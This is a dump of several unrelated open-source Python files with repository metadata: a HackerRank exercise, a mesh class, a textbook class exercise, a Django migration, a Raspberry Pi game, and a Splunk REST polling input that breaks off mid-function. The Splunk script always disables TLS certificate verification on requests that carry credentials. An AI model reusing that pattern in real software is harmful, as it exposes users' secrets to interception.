92e7d30756b64afbf77cb481a3bf486bdcc1f546 | c02f0785a36f970e72239acb73a8ed14e580d2c9 | /interview/interview_preparation_kit/warmup/challenges/sock_merchant/sock_merchant.py | df985956bfa5a017e5801d5c4107f8a8a06efe26 | [] | no_license | Nyakama/hacker_rank | f6fca0fea20a583e6c0e4b11d3e46c0c11c7e051 | fe611c1f9bde7233d5c1e4d9b3e58594193434ea | refs/heads/master | 2022-12-13T09:17:24.093312 | 2020-08-29T00:03:57 | 2020-08-29T00:03:57 | 290,355,187 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 495 | py | #!/bin/python3
import math
import os
import random
import re
import sys
from collections import Counter
# Complete the sockMerchant function below.
def sockMerchant(n, ar):
    """Count the pairs of same-colored socks in *ar*.

    Args:
        n: Declared length of *ar* (kept for the HackerRank signature;
            the count itself only needs the list).
        ar: List of sock color codes.
    Returns:
        Total number of complete pairs; each color contributes
        ``count // 2`` pairs.
    """
    # The original accumulated into a local named `sum`, shadowing the
    # builtin; use the builtin sum over a generator instead.
    return sum(count // 2 for count in Counter(ar).values())
if __name__ == '__main__':
    # HackerRank harness: read n and the sock colors from stdin, write
    # the pair count to the grader's output file.
    fptr = open(os.environ['OUTPUT_PATH'], 'w')
    n = int(input())
    ar = list(map(int, input().rstrip().split()))
    result = sockMerchant(n, ar)
    fptr.write(str(result) + '\n')
    fptr.close()
| [
"lungile.nyakama@gmail.com"
] | lungile.nyakama@gmail.com |
24eb3295d972efef909d1fed9ece99c0780b2a84 | 83bd3d644c8feb0b57ac44b681fee4650677c186 | /Commonstruct/TriangleSlice.py | c9fe4b5b4c43f7755f393bffcfb60bd5863f3c0d | [] | no_license | theForgerass/3DPointCloud | 389d2af938c1cdb0650811db0485afacfefd2c76 | e42fe100a82b87264ab26aebdd4168492ae79b93 | refs/heads/master | 2020-06-04T04:09:06.555579 | 2019-06-05T10:32:51 | 2019-06-12T10:57:00 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | """
三角面片结构
"""
from Commonstruct import Point3D
from Commonstruct import Triangle
class TriangleSlice:
    """Triangle facet of a mesh: a surface normal plus three vertices."""
    __slots__ = ('_facet', '_vertex')
    def __init__(self, facet=None, vertex=None):
        """
        Initialize the triangle facet.
        :param facet: normal vector (Point3D); a fresh Point3D() when omitted
        :param vertex: the three vertices (Triangle); a fresh Triangle() when omitted
        """
        # Build fresh defaults per call: the original `facet=Point3D(),
        # vertex=Triangle()` defaults were evaluated once at definition
        # time, so every default-constructed slice shared (and could
        # mutate) the same two objects.
        self._facet = Point3D() if facet is None else facet
        self._vertex = Triangle() if vertex is None else vertex
    @property
    def facet(self):
        # Normal vector of the facet.
        return self._facet
    @facet.setter
    def facet(self, facet):
        self._facet = facet
    @property
    def vertex(self):
        # The triangle's three vertices.
        return self._vertex
    @vertex.setter
    def vertex(self, vertex):
        self._vertex = vertex
| [
"614490648@qq.com"
] | 614490648@qq.com |
050fbf37649611034d2d17fa1d8f6eaaec527045 | 99b784550a6d306147c022c8d829800b0fbb8c68 | /Part_1_Basics/Chapter_9_Classes/number_served.py | c4bf3cff3db3a73bcf0555f68427754403f58a40 | [] | no_license | apuya/python_crash_course | 116d6598f656d8fed0b4184edbce8e996cd0f564 | 0b2e8a6e9849a198cfb251706500a919d6f51fe7 | refs/heads/main | 2023-06-03T22:41:03.203889 | 2021-06-16T04:07:28 | 2021-06-16T04:07:28 | 367,812,531 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,282 | py | # Python Crash Course: A Hands-On, Project-Based Introduction To Programming
#
# Name: Mark Lester Apuya
# Date: 06/12/2021
#
# Chapter 9: Classes
#
# Exercise 9.4 Number Served:
# Start with your program from Exercise 9-1 (page 162). Add an attribute
# called number_served with a default value of 0. Create an instance called
# restaurant from this class. Print the number of customers the restaurant has
# served, and then change this value and print it again.
# Add a method called set_number_served() that lets you set the number of
# customers that have been served. Call this method with a new number and print
# the value again.
# Add a method called increment_number_served() that lets you increment the
# number of customers who’ve been served. Call this method with any number you
# like that could represent how many customers were served in, say, a day of
# business.
class Restaurant:
    """Model a restaurant and track how many customers it has served."""
    def __init__(self, restaurant_name, cuisine_type):
        """Record the restaurant's name and cuisine; nobody served yet."""
        self.restaurant_name = restaurant_name
        self.cuisine_type = cuisine_type
        self.number_served = 0
    def discribe_restaurant(self):
        """Print what kind of food the restaurant serves."""
        message = f"\n{self.restaurant_name} serves {self.cuisine_type}"
        print(message)
    def open_restaurant(self):
        """Announce that the restaurant is open."""
        message = f"\n{self.restaurant_name} is open."
        print(message)
    def set_number_served(self, number_served):
        """Overwrite the running count of customers served."""
        self.number_served = number_served
    def increment_number_served(self, number_served):
        """Add *number_served* customers to the running count."""
        self.number_served = self.number_served + number_served
restaurant = Restaurant('Olive Garden', 'Italian')
restaurant.discribe_restaurant()
print(f"\nNumber served: {restaurant.number_served}")
restaurant.number_served = 22
print(f"\nNumber served: {restaurant.number_served}")
restaurant.set_number_served(20)
print(f"\nNumber served: {restaurant.number_served}")
restaurant.increment_number_served(2)
print(f"\nNumber served: {restaurant.number_served}") | [
"contact@mapuya.com"
] | contact@mapuya.com |
a5b7854d74583f2b5913bc129ba9fe75b8003d23 | fe2aa0c918f2dd7950414757fe0d1b73c3cb75a4 | /votesystem/vote/migrations/0002_remove_poll_name.py | d7773cc24a907bb7edcf12ab3b09786ba5fdf6c2 | [
"MIT"
] | permissive | majaeseong/votesystem | 6b705f7a2aedce692607de315e5652c44ecd0ce2 | 624fadca0251a81c0417f3a3a23f3d6c38b1cf33 | refs/heads/master | 2020-04-14T06:15:58.589054 | 2019-01-07T05:31:55 | 2019-01-07T05:31:55 | 163,681,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 310 | py | # Generated by Django 2.0.9 on 2018-12-30 11:00
from django.db import migrations
class Migration(migrations.Migration):
    # Builds on the app's initial schema migration.
    dependencies = [
        ('vote', '0001_initial'),
    ]
    # Drops the obsolete Poll.name field.
    operations = [
        migrations.RemoveField(
            model_name='poll',
            name='name',
        ),
    ]
| [
"cpontina@naver.com"
] | cpontina@naver.com |
9ae2cd4efdde3a7a2959e488d8dc87e026f832c1 | f1d2d069d905572bec0d740a476e70f7a9ea3a1f | /src/main/python/game.py | 252d821510edc3db2e1dc4a7a70a46ed66cda5be | [] | no_license | shahchiragr/IoT | 312d75f74dbae4cf82bf7af35fb7dd0ae803efba | 282613e0cf8d8eda79dcac7907802a8b6b083b6b | refs/heads/master | 2021-01-20T19:13:15.704424 | 2016-07-27T05:27:34 | 2016-07-27T05:27:34 | 64,192,817 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,499 | py | #import necessary libraries
import RPi.GPIO as gp,random, time
#set variable for easy pin reference
switchR = 19 #red switch
switchB = 26 #blue switch
ledR = 13
ledG = 6
ledB = 5
#initialize GPIO pins
gp.setmode(gp.BCM)
gp.setup(switchR, gp.IN, pull_up_down=gp.PUD_DOWN)
gp.setup(switchB, gp.IN, pull_up_down=gp.PUD_DOWN)
gp.setup([ledR,ledG,ledB],gp.OUT)
#define a function to monitor switches
def monitorSwitches(seconds):
    """Poll both switches for up to *seconds* seconds.

    On the first press, delegates to announceWinner and returns its
    result; returns False when the window expires with no press.
    """
    #loop for specified time; checking for switch press
    timeEnd = time.time() + seconds
    while time.time() < timeEnd:
        if gp.input(switchR) == True:
            return announceWinner(switchR)
        if gp.input(switchB) == True:
            return announceWinner(switchB)
    return False
# define a function to announce the Winner
def announceWinner(switch):
    """Decide the winner from *switch* (the one pressed first) and flash
    that player's LED ten times.

    Reads the module-level `ledColor` set by the game loop: when green was
    lit, the first presser wins; otherwise the other player wins.
    Returns None, which the game loop treats as "round over".
    """
    # LED matching the pressed switch, and the other player's LED.
    firstBtn = ledR if switch == switchR else ledB
    lastBtn = ledB if switch == switchR else ledR
    # Green means "press now": first presser wins; any other color means
    # the press was wrong, so the other player wins.
    winner = firstBtn if ledColor == ledG else lastBtn
    # Turn off the active color and flash the winning color.
    gp.output(ledColor, False)
    for i in range(0,10):
        gp.output(winner,True)
        time.sleep(0.5)
        gp.output(winner,False)
        time.sleep(0.5)
#play the game, loop until a switch pressed
winner = False
while winner == False:
    #select random Led color
    ledColor = random.choice([ledR,ledG,ledB])
    #play through one color style
    gp.output(ledColor, True) # turn on LED
    # monitorSwitches returns False on timeout (keep looping) or the
    # None from announceWinner after a press; None == False is False,
    # so one press ends the game.
    winner = monitorSwitches(5) #monitor switches
    gp.output(ledColor, False) # turn off LED
gp.cleanup()
| [
"chirag_r_shah@hotmail.com"
] | chirag_r_shah@hotmail.com |
0b507bfacaa250eea6dafb6b5078efa843c7bb81 | 99356336a59b6c63de99156d2147fe3e4c1d13ac | /implementations/rest/bin/rest.py | d2f7d390dbbcb6b5d8db6386eca027e72521c0d2 | [
"Apache-2.0"
] | permissive | splunkdevabhi/SplunkModularInputsPythonFramework | 1ee157fe59feced526db1a278794406c0242acf2 | 04b69c29d95ef4c125bc9766e71d26620e1369db | refs/heads/master | 2020-12-26T01:13:42.298552 | 2015-10-14T17:05:38 | 2015-10-14T17:05:38 | 48,684,067 | 3 | 1 | null | 2015-12-28T09:07:31 | 2015-12-28T09:07:30 | null | UTF-8 | Python | false | false | 32,429 | py | '''
Modular Input Script
Copyright (C) 2012 Splunk, Inc.
All Rights Reserved
'''
import sys,logging,os,time,re,threading
import xml.dom.minidom
import tokens
from datetime import datetime
SPLUNK_HOME = os.environ.get("SPLUNK_HOME")

# Module-level state filled in while processing the modular-input stanza.
RESPONSE_HANDLER_INSTANCE = None
SPLUNK_PORT = 8089  # default Splunk management port
STANZA = None
SESSION_TOKEN = None
REGEX_PATTERN = None

# Dynamically load any eggs in $SPLUNK_HOME/etc/apps/rest_ta/bin so
# bundled dependencies (requests, oauthlib, ...) are importable below.
EGG_DIR = SPLUNK_HOME + "/etc/apps/rest_ta/bin/"

for filename in os.listdir(EGG_DIR):
    if filename.endswith(".egg"):
        sys.path.append(EGG_DIR + filename)
import requests,json
from requests.auth import HTTPBasicAuth
from requests.auth import HTTPDigestAuth
from requests_oauthlib import OAuth1
from requests_oauthlib import OAuth2Session
from oauthlib.oauth2 import WebApplicationClient
from requests.auth import AuthBase
from splunklib.client import connect
from splunklib.client import Service
from croniter import croniter
#set up logging
logging.root  # NOTE(review): bare attribute access, a no-op -- confirm intent
logging.root.setLevel(logging.ERROR)
formatter = logging.Formatter('%(levelname)s %(message)s')
# With zero args the StreamHandler writes to stderr, which Splunk
# captures for modular inputs.
handler = logging.StreamHandler()
handler.setFormatter(formatter)
logging.root.addHandler(handler)
SCHEME = """<scheme>
<title>REST</title>
<description>REST API input for polling data from RESTful endpoints</description>
<use_external_validation>true</use_external_validation>
<streaming_mode>xml</streaming_mode>
<use_single_instance>false</use_single_instance>
<endpoint>
<args>
<arg name="name">
<title>REST input name</title>
<description>Name of this REST input</description>
</arg>
<arg name="endpoint">
<title>Endpoint URL</title>
<description>URL to send the HTTP GET request to</description>
<required_on_edit>false</required_on_edit>
<required_on_create>true</required_on_create>
</arg>
<arg name="http_method">
<title>HTTP Method</title>
<description>HTTP method to use.Defaults to GET. POST and PUT are not really RESTful for requesting data from the API, but useful to have the option for target APIs that are "REST like"</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="request_payload">
<title>Request Payload</title>
<description>Request payload for POST and PUT HTTP Methods</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="auth_type">
<title>Authentication Type</title>
<description>Authentication method to use : none | basic | digest | oauth1 | oauth2 | custom</description>
<required_on_edit>false</required_on_edit>
<required_on_create>true</required_on_create>
</arg>
<arg name="auth_user">
<title>Authentication User</title>
<description>Authentication user for BASIC or DIGEST auth</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="auth_password">
<title>Authentication Password</title>
<description>Authentication password for BASIC or DIGEST auth</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth1_client_key">
<title>OAUTH 1 Client Key</title>
<description>OAUTH 1 client key</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth1_client_secret">
<title>OAUTH 1 Client Secret</title>
<description>OAUTH 1 client secret</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth1_access_token">
<title>OAUTH 1 Access Token</title>
<description>OAUTH 1 access token</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth1_access_token_secret">
<title>OAUTH 1 Access Token Secret</title>
<description>OAUTH 1 access token secret</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_token_type">
<title>OAUTH 2 Token Type</title>
<description>OAUTH 2 token type</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_access_token">
<title>OAUTH 2 Access Token</title>
<description>OAUTH 2 access token</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_refresh_token">
<title>OAUTH 2 Refresh Token</title>
<description>OAUTH 2 refresh token</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_refresh_url">
<title>OAUTH 2 Token Refresh URL</title>
<description>OAUTH 2 token refresh URL</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_refresh_props">
<title>OAUTH 2 Token Refresh Propertys</title>
<description>OAUTH 2 token refresh propertys : key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_client_id">
<title>OAUTH 2 Client ID</title>
<description>OAUTH 2 client ID</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="oauth2_client_secret">
<title>OAUTH 2 Client Secret</title>
<description>OAUTH 2 client secret</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="http_header_propertys">
<title>HTTP Header Propertys</title>
<description>Custom HTTP header propertys : key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="url_args">
<title>URL Arguments</title>
<description>Custom URL arguments : key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="response_type">
<title>Response Type</title>
<description>Rest Data Response Type : json | xml | text</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="streaming_request">
<title>Streaming Request</title>
<description>Whether or not this is a HTTP streaming request : true | false</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="http_proxy">
<title>HTTP Proxy Address</title>
<description>HTTP Proxy Address</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="https_proxy">
<title>HTTPs Proxy Address</title>
<description>HTTPs Proxy Address</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="request_timeout">
<title>Request Timeout</title>
<description>Request Timeout in seconds</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="backoff_time">
<title>Backoff Time</title>
<description>Time in seconds to wait for retry after error or timeout</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="polling_interval">
<title>Polling Interval</title>
<description>Interval time in seconds to poll the endpoint</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="sequential_mode">
<title>Sequential Mode</title>
<description>Whether multiple requests spawned by tokenization are run in parallel or sequentially</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="sequential_stagger_time">
<title>Sequential Stagger Time</title>
<description>An optional stagger time period between sequential requests</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="delimiter">
<title>Delimiter</title>
<description>Delimiter to use for any multi "key=value" field inputs</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="index_error_response_codes">
<title>Index Error Responses</title>
<description>Whether or not to index error response codes : true | false</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="response_handler">
<title>Response Handler</title>
<description>Python classname of custom response handler</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="response_handler_args">
<title>Response Handler Arguments</title>
<description>Response Handler arguments string , key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="response_filter_pattern">
<title>Response Filter Pattern</title>
<description>Python Regex pattern, if present , responses must match this pattern to be indexed</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="custom_auth_handler">
<title>Custom_Auth Handler</title>
<description>Python classname of custom auth handler</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="custom_auth_handler_args">
<title>Custom_Auth Handler Arguments</title>
<description>Custom Authentication Handler arguments string , key=value,key2=value2</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
<arg name="cookies">
<title>Cookies</title>
<description>Persist cookies in format key=value,key2=value2,...</description>
<required_on_edit>false</required_on_edit>
<required_on_create>false</required_on_create>
</arg>
</args>
</endpoint>
</scheme>
"""
def get_current_datetime_for_cron():
    """Return the current local time truncated to whole-minute precision.

    Cron schedules fire on minute boundaries, so seconds and microseconds
    are zeroed to allow exact equality comparison against croniter firings.
    """
    now = datetime.now()
    return now.replace(second=0, microsecond=0)
def do_validate():
    """Validate the stanza configuration splunkd passes on stdin.

    Currently a stub: it reads the validation payload but performs no
    checks, so every configuration is accepted.
    """
    config = get_validation_config()
    #TODO
    #if error , print_validation_error & sys.exit(2)
def do_run(config,endpoint_list):
    """Main polling loop for one input stanza.

    Reads every stanza parameter out of *config*, builds the requests
    keyword arguments (auth, headers, cookies, proxies, payload), then
    polls each URL in *endpoint_list* forever on the configured interval
    or cron schedule, routing each response through the configured
    response handler. Does not return under normal operation.
    """
    #setup some globals
    server_uri = config.get("server_uri")
    global SPLUNK_PORT
    global STANZA
    global SESSION_TOKEN
    global delimiter
    # NOTE(review): slicing at 18 assumes the literal "https://127.0.0.1:"
    # prefix in server_uri — confirm against splunkd's actual value.
    SPLUNK_PORT = server_uri[18:]
    STANZA = config.get("name")
    SESSION_TOKEN = config.get("session_key")
    #params
    http_method=config.get("http_method","GET")
    request_payload=config.get("request_payload")
    #none | basic | digest | oauth1 | oauth2
    auth_type=config.get("auth_type","none")
    #Delimiter to use for any multi "key=value" field inputs
    delimiter=config.get("delimiter",",")
    #for basic and digest
    auth_user=config.get("auth_user")
    auth_password=config.get("auth_password")
    #for oauth1
    oauth1_client_key=config.get("oauth1_client_key")
    oauth1_client_secret=config.get("oauth1_client_secret")
    oauth1_access_token=config.get("oauth1_access_token")
    oauth1_access_token_secret=config.get("oauth1_access_token_secret")
    #for oauth2
    oauth2_token_type=config.get("oauth2_token_type","Bearer")
    oauth2_access_token=config.get("oauth2_access_token")
    oauth2_refresh_token=config.get("oauth2_refresh_token")
    oauth2_refresh_url=config.get("oauth2_refresh_url")
    oauth2_refresh_props_str=config.get("oauth2_refresh_props")
    oauth2_client_id=config.get("oauth2_client_id")
    oauth2_client_secret=config.get("oauth2_client_secret")
    oauth2_refresh_props={}
    # "key=value<delim>key2=value2" strings are parsed into dicts below.
    if not oauth2_refresh_props_str is None:
        oauth2_refresh_props = dict((k.strip(), v.strip()) for k,v in
            (item.split('=',1) for item in oauth2_refresh_props_str.split(delimiter)))
        oauth2_refresh_props['client_id'] = oauth2_client_id
        oauth2_refresh_props['client_secret'] = oauth2_client_secret
    http_header_propertys={}
    http_header_propertys_str=config.get("http_header_propertys")
    if not http_header_propertys_str is None:
        http_header_propertys = dict((k.strip(), v.strip()) for k,v in
            (item.split('=',1) for item in http_header_propertys_str.split(delimiter)))
    url_args={}
    url_args_str=config.get("url_args")
    if not url_args_str is None:
        url_args = dict((k.strip(), v.strip()) for k,v in
            (item.split('=',1) for item in url_args_str.split(delimiter)))
    #json | xml | text
    response_type=config.get("response_type","text")
    # NOTE(review): int() assumes "0"/"1" strings for these boolean params;
    # a "true"/"false" value would raise ValueError — confirm inputs.conf.
    streaming_request=int(config.get("streaming_request",0))
    http_proxy=config.get("http_proxy")
    https_proxy=config.get("https_proxy")
    proxies={}
    if not http_proxy is None:
        proxies["http"] = http_proxy
    if not https_proxy is None:
        proxies["https"] = https_proxy
    cookies={}
    cookies_str=config.get("cookies")
    if not cookies_str is None:
        cookies = dict((k.strip(), v.strip()) for k,v in
            (item.split('=',1) for item in cookies_str.split(delimiter)))
    request_timeout=int(config.get("request_timeout",30))
    backoff_time=int(config.get("backoff_time",10))
    sequential_stagger_time = int(config.get("sequential_stagger_time",0))
    # A purely numeric polling_interval is a fixed number of seconds;
    # anything else is treated as a cron expression for croniter.
    polling_interval_string = config.get("polling_interval","60")
    if polling_interval_string.isdigit():
        polling_type = 'interval'
        polling_interval=int(polling_interval_string)
    else:
        polling_type = 'cron'
        cron_start_date = datetime.now()
        cron_iter = croniter(polling_interval_string, cron_start_date)
    index_error_response_codes=int(config.get("index_error_response_codes",0))
    response_filter_pattern=config.get("response_filter_pattern")
    if response_filter_pattern:
        global REGEX_PATTERN
        REGEX_PATTERN = re.compile(response_filter_pattern)
    # Instantiate the (pluggable) response handler by class name.
    response_handler_args={}
    response_handler_args_str=config.get("response_handler_args")
    if not response_handler_args_str is None:
        response_handler_args = dict((k.strip(), v.strip()) for k,v in
            (item.split('=',1) for item in response_handler_args_str.split(delimiter)))
    response_handler=config.get("response_handler","DefaultResponseHandler")
    module = __import__("responsehandlers")
    class_ = getattr(module,response_handler)
    global RESPONSE_HANDLER_INSTANCE
    RESPONSE_HANDLER_INSTANCE = class_(**response_handler_args)
    # Optional custom auth handler, same plugin pattern as above.
    # NOTE(review): CUSTOM_AUTH_HANDLER_INSTANCE is only bound inside this
    # branch; auth_type == "custom" without custom_auth_handler configured
    # would raise NameError below — confirm this is guarded by the UI.
    custom_auth_handler=config.get("custom_auth_handler")
    if custom_auth_handler:
        module = __import__("authhandlers")
        class_ = getattr(module,custom_auth_handler)
        custom_auth_handler_args={}
        custom_auth_handler_args_str=config.get("custom_auth_handler_args")
        if not custom_auth_handler_args_str is None:
            custom_auth_handler_args = dict((k.strip(), v.strip()) for k,v in (item.split('=',1) for item in custom_auth_handler_args_str.split(delimiter)))
        CUSTOM_AUTH_HANDLER_INSTANCE = class_(**custom_auth_handler_args)
    try:
        auth=None
        oauth2=None
        if auth_type == "basic":
            auth = HTTPBasicAuth(auth_user, auth_password)
        elif auth_type == "digest":
            auth = HTTPDigestAuth(auth_user, auth_password)
        elif auth_type == "oauth1":
            auth = OAuth1(oauth1_client_key, oauth1_client_secret,
                oauth1_access_token ,oauth1_access_token_secret)
        elif auth_type == "oauth2":
            # Seed the session with the persisted token; expires_in="5"
            # forces an early refresh via oauth2_token_updater.
            token={}
            token["token_type"] = oauth2_token_type
            token["access_token"] = oauth2_access_token
            token["refresh_token"] = oauth2_refresh_token
            token["expires_in"] = "5"
            client = WebApplicationClient(oauth2_client_id)
            oauth2 = OAuth2Session(client, token=token,auto_refresh_url=oauth2_refresh_url,auto_refresh_kwargs=oauth2_refresh_props,token_updater=oauth2_token_updater)
        elif auth_type == "custom" and CUSTOM_AUTH_HANDLER_INSTANCE:
            auth = CUSTOM_AUTH_HANDLER_INSTANCE
        # Shared keyword arguments for every request in the loop below.
        req_args = {"verify" : False ,"stream" : bool(streaming_request) , "timeout" : float(request_timeout)}
        if auth:
            req_args["auth"]= auth
        if url_args:
            req_args["params"]= url_args
        if cookies:
            req_args["cookies"]= cookies
        if http_header_propertys:
            req_args["headers"]= http_header_propertys
        if proxies:
            req_args["proxies"]= proxies
        if request_payload and not http_method == "GET":
            req_args["data"]= request_payload
        while True:
            if polling_type == 'cron':
                # Busy-wait (10s granularity) until the next cron firing.
                next_cron_firing = cron_iter.get_next(datetime)
                while get_current_datetime_for_cron() != next_cron_firing:
                    time.sleep(float(10))
            for endpoint in endpoint_list:
                # Snapshot the mutable request parts so post-request code can
                # detect changes made by the response handler and persist them.
                if "params" in req_args:
                    req_args_params_current = dictParameterToStringFormat(req_args["params"])
                else:
                    req_args_params_current = ""
                if "cookies" in req_args:
                    req_args_cookies_current = dictParameterToStringFormat(req_args["cookies"])
                else:
                    req_args_cookies_current = ""
                if "headers" in req_args:
                    req_args_headers_current = dictParameterToStringFormat(req_args["headers"])
                else:
                    req_args_headers_current = ""
                if "data" in req_args:
                    req_args_data_current = req_args["data"]
                else:
                    req_args_data_current = ""
                try:
                    if oauth2:
                        if http_method == "GET":
                            r = oauth2.get(endpoint,**req_args)
                        elif http_method == "POST":
                            r = oauth2.post(endpoint,**req_args)
                        elif http_method == "PUT":
                            r = oauth2.put(endpoint,**req_args)
                    else:
                        if http_method == "GET":
                            r = requests.get(endpoint,**req_args)
                        elif http_method == "POST":
                            r = requests.post(endpoint,**req_args)
                        elif http_method == "PUT":
                            r = requests.put(endpoint,**req_args)
                except requests.exceptions.Timeout,e:
                    # Back off and retry on the next loop pass.
                    logging.error("HTTP Request Timeout error: %s" % str(e))
                    time.sleep(float(backoff_time))
                    continue
                except Exception as e:
                    logging.error("Exception performing request: %s" % str(e))
                    time.sleep(float(backoff_time))
                    continue
                try:
                    r.raise_for_status()
                    if streaming_request:
                        # HTTP streaming: emit each non-empty line as it arrives.
                        for line in r.iter_lines():
                            if line:
                                handle_output(r,line,response_type,req_args,endpoint)
                    else:
                        handle_output(r,r.text,response_type,req_args,endpoint)
                except requests.exceptions.HTTPError,e:
                    error_output = r.text
                    error_http_code = r.status_code
                    if index_error_response_codes:
                        # Optionally index the error itself as an event.
                        error_event=""
                        error_event += 'http_error_code = %s error_message = %s' % (error_http_code, error_output)
                        print_xml_single_instance_mode(error_event)
                        sys.stdout.flush()
                    logging.error("HTTP Request error: %s" % str(e))
                    time.sleep(float(backoff_time))
                    continue
                # Persist any request parameters the response handler mutated
                # (rolling cursors, refreshed cookies, etc.) back to splunkd.
                if "data" in req_args:
                    checkParamUpdated(req_args_data_current,req_args["data"],"request_payload")
                if "params" in req_args:
                    checkParamUpdated(req_args_params_current,dictParameterToStringFormat(req_args["params"]),"url_args")
                if "headers" in req_args:
                    checkParamUpdated(req_args_headers_current,dictParameterToStringFormat(req_args["headers"]),"http_header_propertys")
                if "cookies" in req_args:
                    checkParamUpdated(req_args_cookies_current,dictParameterToStringFormat(req_args["cookies"]),"cookies")
                if sequential_stagger_time > 0:
                    time.sleep(float(sequential_stagger_time))
            if polling_type == 'interval':
                time.sleep(float(polling_interval))
    except RuntimeError,e:
        logging.error("Looks like an error: %s" % str(e))
        sys.exit(2)
def replaceTokens(raw_string):
    """Expand $name$ placeholders in *raw_string* via the tokens module.

    Each $name$ marker is resolved by calling tokens.name(). A list-valued
    result fans out into one string per value (multiplying with earlier
    expansions); a scalar result is substituted in place. Returns the list
    of expanded strings, or None if any substitution raises.
    """
    try:
        expanded = [raw_string]
        for marker in re.findall("\$(?:\w+)\$", raw_string):
            resolved = getattr(tokens, marker[1:-1])()
            if isinstance(resolved, list):
                fanned_out = []
                for value in resolved:
                    fanned_out.extend(u.replace(marker, value) for u in expanded)
                expanded = fanned_out
            else:
                expanded = [u.replace(marker, resolved) for u in expanded]
        return expanded
    except:
        e = sys.exc_info()[1]
        logging.error("Looks like an error substituting tokens: %s" % str(e))
def checkParamUpdated(cached,current,rest_name):
    """Persist a modular-input parameter back to splunkd when it changed.

    Compares the pre-request snapshot (*cached*) against the current
    serialised value; on a difference, writes *current* into this input's
    stanza field *rest_name* via the Splunk REST SDK.
    """
    if not (cached == current):
        try:
            args = {'host':'localhost','port':SPLUNK_PORT,'token':SESSION_TOKEN}
            service = Service(**args)
            # Strip the scheme prefix from the stanza name (assumes a
            # 7-character "rest://" prefix — confirm against inputs.conf).
            item = service.inputs.__getitem__(STANZA[7:])
            item.update(**{rest_name:current})
        except RuntimeError,e:
            logging.error("Looks like an error updating the modular input parameter %s: %s" % (rest_name,str(e),))
def dictParameterToStringFormat(parameter):
    """Serialise a dict back into "k=v<delimiter>k2=v2" string form.

    Uses the module-global ``delimiter`` (set by do_run from the stanza
    configuration). Returns None when *parameter* is None or empty.

    Fix: the original appended the delimiter after every pair and then
    stripped a single trailing character, which left a partial delimiter
    behind whenever ``delimiter`` was more than one character long.
    str.join produces the correct result for any delimiter length.
    """
    if not parameter:
        return None
    return delimiter.join('{}={}'.format(key, val) for key, val in parameter.items())
def oauth2_token_updater(token):
    """Callback handed to OAuth2Session as token_updater.

    When requests-oauthlib auto-refreshes the OAuth2 token, persist the
    new access/refresh tokens into this input's stanza so they survive
    restarts of the modular input.
    """
    try:
        args = {'host':'localhost','port':SPLUNK_PORT,'token':SESSION_TOKEN}
        service = Service(**args)
        # Strip the scheme prefix from the stanza name (assumes a
        # 7-character "rest://" prefix — confirm against inputs.conf).
        item = service.inputs.__getitem__(STANZA[7:])
        item.update(oauth2_access_token=token["access_token"],oauth2_refresh_token=token["refresh_token"])
    except RuntimeError,e:
        logging.error("Looks like an error updating the oauth2 token: %s" % str(e))
def handle_output(response,output,type,req_args,endpoint):
    """Route one response payload through the configured response handler.

    If a response filter pattern was configured (module-global
    REGEX_PATTERN), payloads that do not match are silently dropped.
    Otherwise the payload is passed to RESPONSE_HANDLER_INSTANCE, which is
